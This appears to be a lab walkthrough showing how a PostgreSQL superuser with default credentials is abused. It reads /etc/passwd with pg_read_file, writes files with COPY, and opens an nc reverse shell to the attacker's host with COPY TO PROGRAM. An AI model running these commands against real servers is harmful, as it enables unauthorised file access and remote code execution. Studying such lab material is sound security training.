PostgreSQL


The target PostgreSQL instance is configured with default credentials for the superuser account (postgres:postgres). Everything that follows depends on that role being a superuser: pg_read_file, COPY ... TO '<file>' and COPY ... TO PROGRAM are restricted to superusers or to roles explicitly granted pg_read_server_files, pg_write_server_files or pg_execute_server_program.

Read


postgres=# SELECT pg_read_file('/etc/passwd', 0, 10000);
 
                                       pg_read_file                                        
-------------------------------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash                                                          +
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                          +
 bin:x:2:2:bin:/bin:/usr/sbin/nologin                                                     +
 sys:x:3:3:sys:/dev:/usr/sbin/nologin                                                     +
 sync:x:4:65534:sync:/bin:/bin/sync                                                       +
 games:x:5:60:games:/usr/games:/usr/sbin/nologin                                          +
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin                                          +
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin                                             +
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin                                              +
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin                                        +
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin                                      +
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin                                               +
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin                                     +
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin                                     +
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin                            +
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin                                         +
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin        +
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin                               +
 _apt:x:100:65534::/nonexistent:/usr/sbin/nologin                                         +
 systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin+
 systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin   +
 systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin             +
 messagebus:x:104:110::/nonexistent:/usr/sbin/nologin                                     +
 sshd:x:105:65534::/run/sshd:/usr/sbin/nologin                                            +
 wilson:x:1000:1000:wilson,,,:/home/wilson:/bin/bash                                      +
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin                       +
 postgres:x:106:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash             +
 Debian-snmp:x:107:114::/var/lib/snmp:/bin/false                                          +
 ftp:x:108:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin                                   +
 
(1 row)

Reading the /etc/passwd file via pg_read_file; the second and third arguments (0, 10000) are the byte offset and the maximum number of bytes to read.

Write


postgres=# COPY (SELECT 'test123') TO '/tmp/test.txt';
COPY 1

Writing a file on the database host with COPY ... TO, then verifying its contents through lo_import/lo_get:

postgres=# SELECT lo_import('/tmp/test.txt'); -- will create a large object from the file and return the OID
 lo_import 
-----------
     16391
(1 row)
 
postgres=# SELECT lo_get(16391); -- use the OID returned from the above
       lo_get       
--------------------
 \x746573743132330a
(1 row)
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nibbles_offsec]
└─$ hurl -x '746573743132330a' 
 
Original HEX      :: 746573743132330a
ASCII/RAW DEcoded :: test123

Confirmed: the hex returned by lo_get decodes to the string written by COPY (the trailing 0a is the newline COPY appends in text format), so file write and read-back both work.

Exec


postgres=# COPY (SELECT '') to PROGRAM 'mkfifo /tmp/inkzce; nc 192.168.45.245 5437 0</tmp/inkzce | /bin/sh >/tmp/inkzce 2>&1; rm /tmp/inkzce';

Sending the reverse shell command via COPY ... TO PROGRAM; the program runs as the OS user the server runs under, which the `whoami` output below confirms is postgres.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nibbles_offsec]
└─$ nnc 5437                                       
listening on [any] 5437 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.47] 60534
whoami
postgres
hostname
nibbles
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:de:43 brd ff:ff:ff:ff:ff:ff
    inet 192.168.148.47/24 brd 192.168.148.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the postgres OS account by abusing PostgreSQL superuser privileges. The root cause is a network-reachable superuser protected by default credentials; the server-side file and program functions behaved exactly as designed for that role.